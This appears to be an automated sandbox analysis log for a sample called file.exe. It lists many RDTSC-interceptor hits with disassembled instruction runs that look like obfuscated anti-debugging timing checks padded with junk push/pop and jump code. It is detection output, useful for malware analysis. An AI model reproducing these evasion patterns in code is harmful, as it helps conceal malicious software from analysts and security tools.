Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AEF5 second address: 61AF0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61B04E second address: 61B053 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63AFEC second address: 63B00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F91A12E52FEh 0x0000000c popad 0x0000000d jl 00007F91A12E5302h 0x00000013 jo 00007F91A12E52FCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 639122 second address: 639126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 639126 second address: 63912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63912C second address: 639136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C6F second address: 639C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C75 second address: 639C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C79 second address: 639C83 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A12E52F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C83 second address: 639CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F91A0D1A3E4h 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007F91A0D1A3E8h 0x00000016 jmp 00007F91A0D1A3E7h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639E0B second address: 639E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F91A12E52F6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91A12E52FDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639FEF second address: 63A006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A006 second address: 63A00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A00C second address: 63A012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63079D second address: 6307B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F91A12E52F6h 0x0000000d jne 00007F91A12E52F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6307B0 second address: 6307BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605BC2 second address: 605BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91A12E5300h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605BDD second address: 605BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AA99 second address: 63AA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DEBE second address: 63DED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F91A0D1A3D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DED1 second address: 63DED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DED5 second address: 63DEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE7A second address: 63EE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE7E second address: 63EE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE84 second address: 63EEA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F91A12E52FBh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnp 00007F91A12E52FEh 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EEA5 second address: 63EED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F91A0D1A3DFh 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F91A0D1A3E5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472A8 second address: 6472AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472AC second address: 6472E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E3h 0x00000007 jmp 00007F91A0D1A3E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F91A0D1A3D6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472E5 second address: 6472E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472E9 second address: 647303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jg 00007F91A0D1A3D6h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647303 second address: 647325 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A12E530Dh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647325 second address: 64732B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646660 second address: 64668B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E5301h 0x00000009 jmp 00007F91A12E52FCh 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007F91A12E52F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646972 second address: 64697C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646B0A second address: 646B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646B12 second address: 646B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91A0D1A3DAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646F91 second address: 646F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647137 second address: 64713D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64713D second address: 647147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649380 second address: 649396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649396 second address: 64939C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649420 second address: 649424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649424 second address: 649440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6498AC second address: 6498B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A505 second address: 64A50F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F91A12E52FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1E9 second address: 64B1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1F9 second address: 64B246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2B11h], ebx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F91A12E52F8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov dword ptr [ebp+1246EED7h], ebx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2B5Eh], ecx 0x00000038 mov edi, 131F450Fh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jo 00007F91A12E52F8h 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C170 second address: 64C17A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B963 second address: 64B96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C17A second address: 64C1C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2B91h], esi 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D2852h], edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F91A0D1A3D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, dword ptr [ebp+122D35F0h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1C4 second address: 64C1CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CA29 second address: 64CA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CA38 second address: 64CA3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA54 second address: 64FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CA3E second address: 64CA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA58 second address: 64FA69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA69 second address: 64FA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA6F second address: 64FA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA73 second address: 64FA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA77 second address: 64FA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007F91A0D1A3D6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA8C second address: 64FA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA92 second address: 64FA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65360B second address: 65360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65360F second address: 653627 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91A0D1A3E0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6545AA second address: 6545AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6545AE second address: 6545B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655897 second address: 65589B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65589B second address: 6558A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6575AC second address: 6575B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6558A1 second address: 6558A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6558A7 second address: 6558AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6558AB second address: 6558AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596DE second address: 6596E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6588A7 second address: 6588AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596E4 second address: 659707 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F91A12E5304h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6588AD second address: 6588B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6589AA second address: 6589AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660EDD second address: 660EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B893 second address: 65B897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B897 second address: 65B8A1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65EFF1 second address: 65F01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F91A12E5308h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F91A12E52F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662076 second address: 66208C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F91A0D1A3DCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B8A1 second address: 65B8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F01A second address: 65F020 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66208C second address: 662091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664EEC second address: 664F2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F91A0D1A3D6h 0x0000000d jmp 00007F91A0D1A3DFh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F91A0D1A3E9h 0x0000001a jnc 00007F91A0D1A3D6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666543 second address: 666548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666548 second address: 666552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C8F6 second address: 60C905 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F91A12E52F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C905 second address: 60C919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F91A0D1A3DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BCC4 second address: 66BCCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BCCA second address: 66BCD8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717FA second address: 6717FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717FE second address: 671802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671802 second address: 671829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A12E5309h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671829 second address: 671866 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F91A0D1A3D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F91A0D1A3E2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnc 00007F91A0D1A3DCh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F91A0D1A3D6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67622D second address: 67624B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jnc 00007F91A12E530Fh 0x0000000f jmp 00007F91A12E52FBh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67624B second address: 67624F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6076C6 second address: 6076E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5307h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
